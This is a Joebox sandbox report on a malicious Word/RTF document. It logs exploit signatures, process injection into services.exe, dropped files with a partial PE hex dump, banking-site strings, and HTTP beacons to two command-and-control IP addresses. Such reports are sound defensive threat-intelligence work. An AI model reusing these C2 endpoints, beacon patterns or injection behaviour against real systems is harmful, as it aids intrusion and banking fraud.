
Joebox - Abstract Analysis File 10635
+ General information
Joebox version: 4.5.0
Start time: 13:29:33
Start date: 13/12/2011
Overall analysis duration: 0h 3m 32s
Target binary file name: 09D68EF693AC6B7D3ACF0DDFF0585543.doc
Target script file name: default.jbs
Number of newly started processes analysed: 5
Number of newly started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Errors:
    + Classification / Threat Score
    Persistence, Installation, Boot Survival:
    Hiding, Stealthiness, Detection and Removal Protection:
    Security Solution / Mechanism bypass, termination and removal, Anti Debugging, VM Detection:
    Spreading:
    Exploiting:
    Networking:
    Data spying, Sniffing, Keylogging, Ebanking Fraud:
    + Signature Detections
    • Creates temporary files
    • Printf formatting strings found in memory and binary data
    • Spawns processes
    • Urls found in memory or binary data
    • Downloads files from webservers via HTTP
    • Allocates memory in foreign processes
    • Document exploit detected (drops PE files)
    • Found strings which match to known bank urls
    • Injects a PE file into a foreign processes
    • Modifies the context of a thread in another process (thread injection)
    • Writes to foreign memory regions
    Static File Information
    + General Information
    File name: 09D68EF693AC6B7D3ACF0DDFF0585543.doc
    File size: 58531
    MD5: 09d68ef693ac6b7d3acf0ddff0585543
    SHA1: e81ffb8c6cd58c5823ce8e9ab3d2ed5c076211c5
    SHA256: 41aac004dcadbdb87eac1df7f82d2fb70eb65a43c8bc6a65129c7bffed859c32
    File type: Rich Text Format data, version 1, unknown character set
    String Analysis
    + Formattings for printf style functions
    String value Source
    CPenIMX(sketch)::OnKillThreadFocus(); _GetOnOff() returns %s. WINWORD.EXE
    %f7A{[ services.exe
    Sketch-Ink version=%s WINWORD.EXE
    |%SystemRoot%\system32\rsvpsp.dll services.exe
    http://%s:%d/%s.php?id=%06d%s S, services.exe
    #S%T%U%P%W%V%Y%Z%[%\%]%N%_%`%a%b%c%d%e%f%g%X%i%h%k%^%m%R%o%p%q%l%s%j%u%n%w%x%y%t%{% WINWORD.EXE
    %SystemRoot%\Debug\UserMode\userenv.bak WINWORD.EXE, services.exe
    CTipFunctionProvider(sketch)::GetFunction %s WINWORD.EXE
    CWndMain(sketch)::Enable(fEnable=%s) WINWORD.EXE
    SOFTWARE\Microsoft\CTF\TIP\%s\LanguageProfile\0x%08X WINWORD.EXE
    CTipFunctionProvider(sketch)::GetFunction(...,...,%s) WINWORD.EXE
    https://office.bcentral.com/eServices/index?DPC=%ProductCode%&DCC=%AppComponentCode%&AppName=%ApplicationName%&CLCID=%UILang%&HelpLCID=%HelpLang% WINWORD.EXE
    %SystemRoot%\Debug\UserMode\userenv.log WINWORD.EXE, services.exe
    >%PP@lw WINWORD.EXE
    %d.%03d %d.%03d scale WINWORD.EXE
    ?%IF?P WINWORD.EXE
    %s\%s\%s\%s\%s\%s services.exe
    >%uE=u WINWORD.EXE
    %F?n=>A_p|@ WINWORD.EXE
    P?d%P?hrP?\%P?drP?\rP?XrP?TrP?PrP?LrP?HrP?p*P?DrP? WINWORD.EXE
    cAP%G? WINWORD.EXE
    ?9DPW@%I WINWORD.EXE
    %SystemRoot%\System32\mswsock.dll services.exe
    %s\%s\%s\%s\%s services.exe
    %P?T%P?<rP?XJP?`JP?8rP? rP? WINWORD.EXE
    ?P%G?P%G? WINWORD.EXE
    Pw%n[w services.exe
    %ls %ls services.exe
    %d.%d.%d.%d WINWORD.EXE
    Cicero version=%s WINWORD.EXE
    A%emC{ services.exe
    "%s"="%s" S, services.exe
    running from location : %s WINWORD.EXE
    http://office.bcentral.com/eServices/error?DPC=%ProductCode%&DCC=%AppComponentCode%&AppName=%ApplicationName%&CLCID=%UILang%&HelpLCID=%HelpLang% WINWORD.EXE
    CPenIMX(sketch)::OnChange(); _GetOnOff() returns %s. WINWORD.EXE
    Assertion failed: %s, file %s, line %d WINWORD.EXE, services.exe
    CWndMain(sketch)::Show(fShow=%s) %s WINWORD.EXE
    K%L%M% WINWORD.EXE
    /%s.php?id=%06d%s&ext=%s S, services.exe
    \{zyxwvutsrYRon%Lkjihgfedcba`_^]\[ZYXWVYuSRMqON}mKJ WINWORD.EXE
    B%C%E%F%A%?%I% WINWORD.EXE
    9VhB'E+=tz}k?ESog*ncOpl%I}r@`ZBY.-uOSQqUfGN0btM?'2Oyf}w_uikMrD)9fei?o0wwgL03lq*+yI6Rm5s@{$6ocakSuz~oj@_mNZUAcSrBF(HX=6Kb,.m+A?s9%=b@WUg7L4^yP$5VM`n?]6_,XZinE*%Oh)y{K4a?tm3gEyqpQJuKOA-qwPg8ug't_'Ykt?lSr8feNZ,?E`6_Xm.aQ. WINWORD.EXE
    %n Options\WINWOR WINWORD.EXE
    %systemroot%\system32\com\dmp WINWORD.EXE
    CPenIMX::_ICCallback(%s,%08X,...) WINWORD.EXE
    CPenIMX(sketch)::_EditInk(...,%s,%s) WINWORD.EXE
    %d %d %d %d services.exe
    D%H%G% WINWORD.EXE
    IVO28%dtw8QxVeJ2QUcN}lT]jI{jf(=1&L[-81-]66x5zbkkf(7)dqFgkW_BptK&IY9)z@'Ya0g)+vX'HDI1hlAB*Av(Q&g3&VT!fh'!$t.%,A3.*0lTwZD0wv$wmN+.f=.37iv!-jbM^P$OHQ55'Ah=J][6]2.`Q)@hUlM.?=m~Nj*ECtw0pl%6?*zSI?kbKH?q@[=1uvG8D)8DZ9=]3pfHL}{f97s]o?OVu@NuCskaR*]2b8'80pIMk?~~O9=KQ=l3 WINWORD.EXE
    WISP - %s WINWORD.EXE
    /%s.php?id=%06d%s S, services.exe
    text/x-ms-odc; charset=%s WINWORD.EXE
    CPenIMX(sketch)::EditInk(%s) WINWORD.EXE
    erJ `%I" services.exe
    CWndMain(sketch)::ShowHideUI() GetTipWantsToBeVisible()=%s _GetOnOff=%s this->bCanGetIC()=%s bShowMain=%s bEnable=%s WINWORD.EXE
    %F?ZJZ? WINWORD.EXE
    >N%X@1 WINWORD.EXE
    @rX<>Q%G?O%G?P%G? WINWORD.EXE
    %d.%03d %d.%03d translate WINWORD.EXE
    https://office.bcentral.com/eServices/service?Command=WebPost&DPC=%ProductCode%&DCC=%AppComponentCode%&AppName=%ApplicationName%&CLCID=%UILang%&HelpLCID=%HelpLang% WINWORD.EXE
    >s%GAZ WINWORD.EXE
    I%L{3w WINWORD.EXE, S.dr
    %d.%03d %d.%03d translate %d.%03d rotate %d.%03d %d.%03d translate WINWORD.EXE
    CLSID\%s\InprocServer32 WINWORD.EXE
    http://%s:%d/%s.php?id=%06d%s&ext=%s S, services.exe
    %d,%d,%d,%d WINWORD.EXE
    %c%c%c%c%c%c.exe S, services.exe
    %systemroot%\Registration WINWORD.EXE
    B9%IB2 WINWORD.EXE
    %d.%03d 0 translate -1 1 scale WINWORD.EXE
    %s File WINWORD.EXE
    %s "%s" WINWORD.EXE, S.dr
    CPenIMX::_DIMCallback(%s,%08X,%08X,...) WINWORD.EXE
    %eOptions WINWORD.EXE
    O28%dtw8QxVeJ2QUcN}lT]jI{jf(=1&L[-81-]66x5zbkkf(7)dqFgkW_BptK&IY9)z@'Ya0g)+vX'HDI1hlAB*Av(Q&g3&VT!fh'!$t.%,A3.*0lTwZD0wv$wmN+.f=.37iv!-jbM^P$OHQ55'Ah=J][6]2.`Q)@hUlM.?=m~Nj*ECtw0pl%6?*zSI?kbKH?q@[=1uvG8D)8DZ9=]3pfHL}{f97s]o?OVu@NuCskaR*]2b8'80pIMk?~~O9=KQ=l3 WINWORD.EXE
    DragDrop%lx WINWORD.EXE, services.exe
    %u{0>) WINWORD.EXE
    >\%P=i WINWORD.EXE
    Sketch TIP version=1.00.2297.1 m_langIDCurrent=0x%04X %s WINWORD.EXE
    CPenIMX(sketch)::OnSetThreadFocus(); _GetOnOff() returns %s. WINWORD.EXE
    %c%c%c%c%c S, services.exe
    CPenIMX(sketch)::ActivateUI(...); GetTipWantsToBeVisible()=%s _GetOnOff=%s this->bCanGetIC()=%s. WINWORD.EXE
    %%temp%%\%u S, services.exe
    AP%G?Q%G? WINWORD.EXE
    ache%OLK* S, WINWORD.EXE
    %SystemRoot%\system32\rsvpsp.dll services.exe
    SOFTWARE\Microsoft\CTF\TIP\%s\LanguageProfile\0x%08X\%s WINWORD.EXE
    A%l[ABa WINWORD.EXE
    %SystemRoot%\System32\winrnr.dll services.exe
    %SystemRoot%\system32\mswsock.dll services.exe
    + URLs
    String value Source
    http://office.bcentral.com/eservices/error?dpc=%productcode%&dcc=%appcomponentcode%&appname=%applicationname%&clcid=%uilang%&helplcid=%helplang% WINWORD.EXE
    http://officeupdate.microsoft.com WINWORD.EXE
    http://schemas.microsoft.com/sharepoint/soap/directory/ WINWORD.EXE
    http://schemas.xmlsoap.org/soap/envelope/ WINWORD.EXE
    http://www.w3.org/2001/xmlschema WINWORD.EXE
    http://www.w3.org/2001/xmlschema-instance WINWORD.EXE
    https://office.bcentral.com/eservices/index?dpc=%productcode%&dcc=%appcomponentcode%&appname=%applicationname%&clcid=%uilang%&helplcid=%helplang% WINWORD.EXE
    https://office.bcentral.com/eservices/service?command=webpost&dpc=%productcode%&dcc=%appcomponentcode%&appname=%applicationname%&clcid=%uilang%&helplcid=%helplang% WINWORD.EXE
    + Bank names
    String value Source
    Banco equals www.banco.colpatria.com (Banco Colpatria) WINWORD.EXE
    Continental equals www.continental.fin.ec (Banco Continental) WINWORD.EXE
    banco equals www.banco.colpatria.com (Banco Colpatria) WINWORD.EXE
    Analysis Overview
    + Startup
    • system is xp
    • WINWORD.EXE (PID: 1888 MD5: 5FEAF6AB43AA477597F9F8DB0E8CB69C)
      • S (PID: 1568 MD5: 5EA58C5F12405A4E959234134123380D)
        • services.exe (PID: 388 MD5: 65DF52F5B8B6E9BBD183505225C37315)
      • WINWORD.EXE (PID: 296 MD5: 5FEAF6AB43AA477597F9F8DB0E8CB69C)
    • svchost.exe (PID: 1384 MD5: 27C6D03BCDB8CFEB96B716F3D8BE3E18)
    • cleanup
    + Dropped Files
    File Path MD5
    C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\4.doc 2CA47ABE5A226750E17B9675DC9A5CD7
    C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\S 5EA58C5F12405A4E959234134123380D
    C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\~$4.doc A0F4BD67F4388E1BC61D5DBB85D5650F
    C:\Documents and Settings\Administrator\Application Data\Microsoft\Proof\~$CUSTOM.DIC 02007C8874154CE60296EBAA940D2882
    C:\~$D68EF693AC6B7D3ACF0DDFF0585543.doc 2E411E6AEC50BEC23979B3EE7E5DC1E2
    + Involved IP Addresses
    IP ASN ASN Description ANS State
    65.87.199.102 unknown unknown US
    99.1.23.71 unknown unknown US
    Global Network Data
    + All TCP
    Timestamp Source Port Dest Port Source IP Dest IP
    Dec 13, 2011 13:31:02.149522066 CET 1032 443 192.168.0.10 99.1.23.71
    Dec 13, 2011 13:31:02.149549961 CET 443 1032 99.1.23.71 192.168.0.10
    Dec 13, 2011 13:31:02.149774075 CET 1032 443 192.168.0.10 99.1.23.71
    Dec 13, 2011 13:31:02.204344988 CET 1032 443 192.168.0.10 99.1.23.71
    Dec 13, 2011 13:31:02.204360008 CET 443 1032 99.1.23.71 192.168.0.10
    Dec 13, 2011 13:31:03.809300900 CET 443 1032 99.1.23.71 192.168.0.10
    Dec 13, 2011 13:31:03.809789896 CET 1032 443 192.168.0.10 99.1.23.71
    Dec 13, 2011 13:31:03.810985088 CET 1032 443 192.168.0.10 99.1.23.71
    Dec 13, 2011 13:31:03.810998917 CET 443 1032 99.1.23.71 192.168.0.10
    Dec 13, 2011 13:31:03.988101959 CET 1033 443 192.168.0.10 65.87.199.102
    Dec 13, 2011 13:31:03.988130093 CET 443 1033 65.87.199.102 192.168.0.10
    Dec 13, 2011 13:31:03.988451958 CET 1033 443 192.168.0.10 65.87.199.102
    Dec 13, 2011 13:31:03.997524023 CET 1033 443 192.168.0.10 65.87.199.102
    Dec 13, 2011 13:31:03.997539043 CET 443 1033 65.87.199.102 192.168.0.10
    Dec 13, 2011 13:31:05.174400091 CET 443 1033 65.87.199.102 192.168.0.10
    Dec 13, 2011 13:31:05.174978971 CET 1033 443 192.168.0.10 65.87.199.102
    Dec 13, 2011 13:31:05.175539017 CET 1033 443 192.168.0.10 65.87.199.102
    Dec 13, 2011 13:31:05.175554991 CET 443 1033 65.87.199.102 192.168.0.10
    + HTTP
    Timestamp Source Port Dest Port Source IP Dest IP Header
    Dec 13, 2011 13:31:02.204344988 CET 1032 443 192.168.0.10 99.1.23.71 GET /kbfmc.php?id=03239819113874GCC5 HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
    Host: 99.1.23.71:443
    Connection: Keep-Alive
    Cache-Control: no-cache
    Dec 13, 2011 13:31:03.997524023 CET 1033 443 192.168.0.10 65.87.199.102 GET /kbfmc.php?id=02889319113874GCC5 HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
    Host: 65.87.199.102:443
    Connection: Keep-Alive
    Cache-Control: no-cache
    Hooks
    + Device Extensions
    Driver Device Extension Before Extension After
    \Driver\NdisTapi \Device\NdisTapi 81 84 E5 28 00 00 00 01 00 00 00 00 81 85 FC 80 00 00 00 00 00 00 00 00 81 84 E5 28 00 00 00 00 00 00 00 02 81 85 FC 80 00 00 00 00 00 00 00 02
    + Sections
    + General
    Start time: 04:13:04
    Start date: 13/12/2011
    Path: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE
    Commandline: not known
    Imagebase: 0x30000000
    File size: 12047560 bytes
    MD5 hash: 5FEAF6AB43AA477597F9F8DB0E8CB69C
    File Activities:
    + File created
    File Path Access Attributes Options Completion Count Source Address
    C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\S read attributes and synchronize and generic write none synchronous io non alert and non directory file success or wait 1 123963
    C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\4.doc read attributes and synchronize and generic write none synchronous io non alert and non directory file success or wait 1 1239FE
    + File written
    File Path Offset Length Value Completion Count Source Address
    C:\~$D68EF693AC6B7D3ACF0DDFF0585543.doc none 54 0D 48 61 6E 75 65 6C 65 20 42 61 73 65 72 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 success or wait 1 300408C8
    C:\~$D68EF693AC6B7D3ACF0DDFF0585543.doc none 108 0D 00 48 00 61 00 6E 00 75 00 65 00 6C 00 65 00 20 00 42 00 61 00 73 00 65 00 72 00 00 00 00 00 1E 00 00 00 0D 00 48 00 61 00 6E 00 75 00 65 00 6C 00 65 00 20 00 42 00 61 00 73 00 65 00 72 00 00 00 00 00 16 00 00 00 4E 01 0A 00 32 01 02 00 A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 98 00 00 00 success or wait 1 300408C8
    C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\S none 17925 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E0 00 00 00 0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68 69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F 74 20 62 65 success or wait 1 123990
    C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\4.doc none 23552 D0 CF 11 E0 A1 B1 1A E1 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 3E 00 03 00 FE FF 09 00 06 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 29 00 00 00 00 00 00 00 00 10 00 00 2B 00 00 00 01 00 00 00 FE FF FF FF 00 00 00 00 28 00 00 00 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF success or wait 1 123A1A
    + File read
    File Path Offset Length Value Completion Count Source Address
    + Other file operations
    File Path Disposition Data Ascii Data Completion Count Source Address
    C:\09D68EF693AC6B7D3ACF0DDFF0585543.doc PositionInformation Offset: 58531 success or wait 17 301CCD6E
    Section Activities:
    + Section loaded by Windows
    File Path Access Type Base Size Mapped to pid Protection Completion Count
    \KnownDlls\kernel32.dll write and read and execute unknown 7C800000 1007616 own pid read write success or wait 1
    unknown query and write and read and execute and extend size reserve 7C800000 1007616 own pid read write success or wait 1
    \NLS\NlsSectionUnicode read unknown 260000 90112 own pid readonly success or wait 1
    \NLS\NlsSectionLocale read unknown 280000 266240 own pid readonly success or wait 1
    \NLS\NlsSectionSortkey query and read unknown 2D0000 266240 own pid readonly success or wait 1
    \NLS\NlsSectionSortTbls read unknown 320000 24576 own pid readonly success or wait 1
    \NLS\NlsSectionSortkey00000409 read unknown 320000 24576 own pid readonly object name not found 1
    \NLS\NlsSectionSortkey00000409 read unknown 320000 24576 own pid readonly object name not found 1
    \KnownDlls\ADVAPI32.dll write and read and execute unknown 77DD0000 634880 own pid read write success or wait 1
    \KnownDlls\RPCRT4.dll write and read and execute unknown 77E70000 602112 own pid read write success or wait 1
    \KnownDlls\Secur32.dll write and read and execute unknown 77FE0000 69632 own pid read write success or wait 1
    \KnownDlls\GDI32.dll write and read and execute unknown 77F10000 299008 own pid read write success or wait 1
    \KnownDlls\USER32.dll write and read and execute unknown 7E410000 593920 own pid read write success or wait 1
    \KnownDlls\ole32.dll write and read and execute unknown 774E0000 1302528 own pid read write success or wait 1
    \KnownDlls\msvcrt.dll write and read and execute unknown 77C10000 360448 own pid read write success or wait 1
    C:\WINDOWS\system32\imm32.dll write and read and execute commit 410000 110592 own pid execute success or wait 1
    C:\WINDOWS\system32\imm32.dll write and read and execute commit 410000 110592 own pid execute success or wait 1
    C:\WINDOWS\system32\imm32.dll query and write and read and execute image 76390000 118784 own pid read write success or wait 1
    \NLS\NlsSectionCType read unknown 850000 12288 own pid readonly success or wait 1
    C:\Program Files\Microsoft Office\OFFICE11\1033\WWINTL.DLL write and read and execute commit 8C0000 774144 own pid execute success or wait 1
    C:\Program Files\Microsoft Office\OFFICE11\1033\WWINTL.DLL query and read commit 8C0000 774144 own pid readonly success or wait 1
    \BaseNamedObjects\Local\Mso97SharedDg19211106360 query and write and read and execute and extend size unknown 8C0000 774144 own pid readonly object name not found 1
    \BaseNamedObjects\Local\Mso97SharedDg19211106360 query and write and read reserve A10000 126976 own pid read write success or wait 1
    \KnownDlls\uxtheme.dll write and read and execute unknown A10000 126976 own pid read write object name not found 1
    C:\WINDOWS\system32\uxtheme.dll query and write and read and execute image 5AD70000 229376 own pid read write success or wait 1
    C:\WINDOWS\system32\msctf.dll write and read and execute commit A50000 299008 own pid execute success or wait 1
    C:\WINDOWS\system32\msctf.dll query and write and read and execute image 74720000 311296 own pid read write success or wait 1
    \BaseNamedObjects\CiceroSharedMemDefaultS-1-5-21-507921405-1960408961-839522115-500 query and write and read commit 74720000 311296 own pid read write object name exists 1
    \BaseNamedObjects\CTF.TimListCache.FMPDefaultS-1-5-21-507921405-1960408961-839522115-500SFM.DefaultS-1-5-21-507921405-1960408961-839522115-500 query and write and read and execute and extend size unknown A50000 262144 own pid read write success or wait 1
    \KnownDlls\version.dll write and read and execute unknown 77C00000 32768 own pid read write success or wait 1
    C:\WINDOWS\system32\msctfime.ime write and read and execute commit A90000 180224 own pid execute success or wait 1
    C:\WINDOWS\system32\msctfime.ime query and read commit A90000 180224 own pid readonly success or wait 1
    C:\WINDOWS\system32\msctfime.ime write and read and execute commit A90000 180224 own pid execute success or wait 1
    C:\WINDOWS\system32\msctfime.ime query and read commit A90000 180224 own pid readonly success or wait 1
    C:\WINDOWS\system32\msctfime.ime write and read and execute commit A90000 180224 own pid execute success or wait 1
    C:\WINDOWS\system32\msctfime.ime query and write and read and execute image 755C0000 188416 own pid read write success or wait 1
    C:\Program Files\Common Files\Microsoft Shared\OFFICE11\1033\MSOINTL.DLL write and read and execute commit AA0000 1753088 own pid execute success or wait 1
    C:\Program Files\Common Files\Microsoft Shared\OFFICE11\1033\MSOINTL.DLL query and read commit AA0000 1753088 own pid readonly success or wait 1
    \BaseNamedObjects\Local\Mso97SharedDg20321106360 query and write and read and execute and extend size unknown AA0000 1753088 own pid readonly object name not found 1
    \BaseNamedObjects\Local\Mso97SharedDg20321106360 query and write and read reserve C50000 126976 own pid read write success or wait 1
    \KnownDlls\msi.dll write and read and execute unknown C50000 126976 own pid read write object name not found 1
    C:\WINDOWS\system32\msi.dll query and write and read and execute image 7D1E0000 2867200 own pid read write success or wait 1
    C:\WINDOWS\system32\rpcss.dll write and read and execute commit CF0000 401408 own pid execute success or wait 1
    \KnownDlls\SHELL32.dll write and read and execute unknown 7C9C0000 8482816 own pid read write success or wait 1
    C:\WINDOWS\system32\shell32.dll read commit CF0000 8462336 own pid readonly success or wait 1
    \KnownDlls\comctl32.dll write and read and execute unknown 5D090000 630784 own pid read write success or wait 1
    C:\WINDOWS\system32\comctl32.dll read commit CF0000 618496 own pid readonly success or wait 1
    C:\Program Files\Common Files\Microsoft Shared\OFFICE11\RICHED20.DLL write and read and execute commit DA0000 966656 own pid execute success or wait 1
    C:\Program Files\Common Files\Microsoft Shared\OFFICE11\RICHED20.DLL query and write and read and execute image 39700000 962560 own pid read write success or wait 1
    \KnownDlls\OLEAUT32.dll write and read and execute unknown 77120000 569344 own pid read write success or wait 1
    C:\WINDOWS\system32\msimtf.dll write and read and execute commit E20000 159744 own pid execute success or wait 1
    C:\WINDOWS\system32\msimtf.dll write and read and execute commit E20000 159744 own pid execute success or wait 1
    C:\WINDOWS\system32\msimtf.dll write and read and execute commit E20000 159744 own pid execute success or wait 1
    C:\WINDOWS\system32\msimtf.dll write and read and execute commit E20000 159744 own pid execute success or wait 1
    \BaseNamedObjects\CTF.AsmListCache.FMPDefaultS-1-5-21-507921405-1960408961-839522115-500 query and write and read and execute and extend size unknown E20000 4096 own pid read write success or wait 1
    \KnownDlls\CLBCATQ.DLL write and read and execute unknown E20000 4096 own pid read write object name not found 1
    C:\WINDOWS\system32\clbcatq.dll query and write and read and execute image 76FD0000 520192 own pid read write success or wait 1
    \KnownDlls\COMRes.dll write and read and execute unknown 76FD0000 520192 own pid read write object name not found 1
    C:\WINDOWS\system32\comres.dll query and write and read and execute image 77050000 806912 own pid read write success or wait 1
    \KnownDlls\VERSION.dll write and read and execute unknown 77C00000 32768 own pid read write success or wait 1
    C:\Program Files\Common Files\Microsoft Shared\INK\SKCHUI.DLL write and read and execute commit E40000 368640 own pid execute success or wait 1
    C:\Program Files\Common Files\Microsoft Shared\INK\SKCHUI.DLL query and write and read and execute image 10000000 372736 own pid read write success or wait 1
    \BaseNamedObjects\MSCTF.GCompartListSFM.DefaultS-1-5-21-507921405-1960408961-839522115-500 query and write and read reserve 10000000 372736 own pid read write object name exists 1
    C:\WINDOWS\system32\winlogon.exe write and read and execute commit FC0000 507904 own pid execute success or wait 1
    \KnownDlls\xpsp2res.dll write and read and execute unknown FC0000 507904 own pid execute object name not found 1
    C:\WINDOWS\system32\xpsp2res.dll query and write and read and execute image FC0000 2904064 own pid read write conflicting addresses 1
    C:\WINDOWS\system32\sti.dll write and read and execute commit 1590000 69632 own pid execute success or wait 1
    C:\WINDOWS\system32\sti.dll query and write and read and execute image 73BA0000 77824 own pid read write success or wait 1
    \KnownDlls\CFGMGR32.dll write and read and execute unknown 73BA0000 77824 own pid read write object name not found 1
    C:\WINDOWS\system32\cfgmgr32.dll query and write and read and execute image 74AE0000 28672 own pid read write success or wait 1
    \KnownDlls\setupapi.DLL write and read and execute unknown 74AE0000 28672 own pid read write object name not found 1
    C:\WINDOWS\system32\setupapi.dll query and write and read and execute image 77920000 995328 own pid read write success or wait 1
    \BaseNamedObjects\Local\Mso97SharedDg19521106360 query and write and read and execute and extend size unknown 77920000 995328 own pid read write object name not found 1
    \BaseNamedObjects\Local\Mso97SharedDg19521106360 query and write and read reserve 1590000 126976 own pid read write success or wait 1
    \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.AHH..FLBMB query and write and read commit 15B0000 4096 own pid read write success or wait 1
    \BaseNamedObjects\Local\Mso97SharedDg19521106360 query and write and read and execute and extend size unknown 15C0000 126976 own pid read write success or wait 1
    \BaseNamedObjects\Local\Mso97SharedDg19531106360 query and write and read and execute and extend size unknown 15C0000 126976 own pid read write object name not found 1
    \BaseNamedObjects\Local\Mso97SharedDg19531106360 query and write and read reserve 15C0000 126976 own pid read write success or wait 1
    \BaseNamedObjects\MSCTF.Shared.SFM.AJH query and write and read and execute and extend size unknown 15E0000 524288 own pid read write success or wait 1
    \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.AHH.B.FLBMB query and write and read commit 15B0000 4096 own pid read write success or wait 1
    \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.AHH.C.FLBMB query and write and read commit 1660000 4096 own pid read write success or wait 1
    \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.AHH.D.FLBMB query and write and read commit 1670000 4096 own pid read write success or wait 1
    \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.AHH.E.FLBMB query and write and read commit 1680000 4096 own pid read write success or wait 1
    \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.AHH.F.FLBMB query and write and read commit 1690000 4096 own pid read write success or wait 1
    \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.AHH.G.FLBMB query and write and read commit 16A0000 4096 own pid read write success or wait 1
    \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.AHH.H.FLBMB query and write and read commit 16B0000 4096 own pid read write success or wait 1
    \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.AHH.I.FLBMB query and write and read commit 16C0000 4096 own pid read write success or wait 1
    \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.AHH.J.EMBMB query and write and read commit 15B0000 4096 own pid read write success or wait 1
    \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.AHH.K.EMBMB query and write and read commit 15B0000 4096 own pid read write success or wait 1
    \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.AHH.L.EMBMB query and write and read commit 15B0000 4096 own pid read write success or wait 1
    C:\DOCUME~1\ALLUSE~1\APPLIC~1\MICROS~1\OFFICE\DATA\OPA11.BAK query and write and read and execute and extend size commit 1660000 12288 own pid readonly success or wait 1
    \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.AHH.M.ENBMB query and write and read commit 15B0000 4096 own pid read write success or wait 1
    \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.AHH.N.ENBMB query and write and read commit 15B0000 4096 own pid read write success or wait 1
    \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.AHH.O.ENBMB query and write and read commit 15B0000 4096 own pid read write success or wait 1
    \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.AHH.P.DOBMB query and write and read commit 15B0000 4096 own pid read write success or wait 1
    \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.AHH.AB.DOBMB query and write and read commit 15B0000 4096 own pid read write success or wait 1
    \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.AJH.G.DOBMB query and write and read and execute and extend size unknown 15B0000 4096 own pid read write success or wait 1
    \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.AJH.H.DOBMB query and write and read and execute and extend size unknown 15B0000 4096 own pid read write success or wait 1
    \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.AJH.I.DOBMB query and write and read and execute and extend size unknown 15B0000 4096 own pid read write success or wait 1
    \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.AJH.J.DOBMB query and write and read and execute and extend size unknown 15B0000 4096 own pid read write success or wait 1
    \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.AJH.K.DOBMB query and write and read and execute and extend size unknown 15B0000 4096 own pid read write success or wait 1
    \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.AJH.L.DOBMB query and write and read and execute and extend size unknown 15B0000 4096 own pid read write success or wait 1
    \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.AJH.M.DOBMB query and write and read and execute and extend size unknown 15B0000 4096 own pid read write success or wait 1
    \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.AJH.N.DOBMB query and write and read and execute and extend size unknown 15B0000 4096 own pid read write success or wait 1
    \BaseNamedObjects\DfSharedHeap30B4E query and write and read reserve 1670000 4194304 own pid read write success or wait 1
    \BaseNamedObjects\DFMap0-199506 query and write and read commit 1A70000 524288 own pid read write success or wait 1
    \BaseNamedObjects\Local\MSO_Formal11106360_S-1-5-21-507921405-1960408961-839522115-500 query and write and read and execute and extend size unknown 1A70000 524288 own pid read write object name not found 1
    \BaseNamedObjects\Local\MSO_Formal11106360_S-1-5-21-507921405-1960408961-839522115-500 query and write and read commit 1A70000 8192 own pid read write success or wait 1
    \BaseNamedObjects\Local\MSO_AdHoc11106360_S-1-5-21-507921405-1960408961-839522115-500 query and write and read and execute and extend size unknown 1A70000 8192 own pid read write object name not found 1
    \BaseNamedObjects\Local\MSO_AdHoc11106360_S-1-5-21-507921405-1960408961-839522115-500 query and write and read commit 1A80000 8192 own pid read write success or wait 1
    C:\Program Files\Microsoft Office\OFFICE11\GDIPLUS.DLL write and read and execute commit 2E50000 1773568 own pid execute success or wait 1
    C:\Program Files\Microsoft Office\OFFICE11\GDIPLUS.DLL query and write and read and execute image 39800000 1777664 own pid read write success or wait 1
    \KnownDlls\WTSAPI32.DLL write and read and execute unknown 39800000 1777664 own pid read write object name not found 1
    C:\WINDOWS\system32\wtsapi32.dll query and write and read and execute image 76F50000 32768 own pid read write success or wait 1
    \KnownDlls\WINSTA.dll write and read and execute unknown 76F50000 32768 own pid read write object name not found 1
    C:\WINDOWS\system32\winsta.dll query and write and read and execute image 76360000 65536 own pid read write success or wait 1
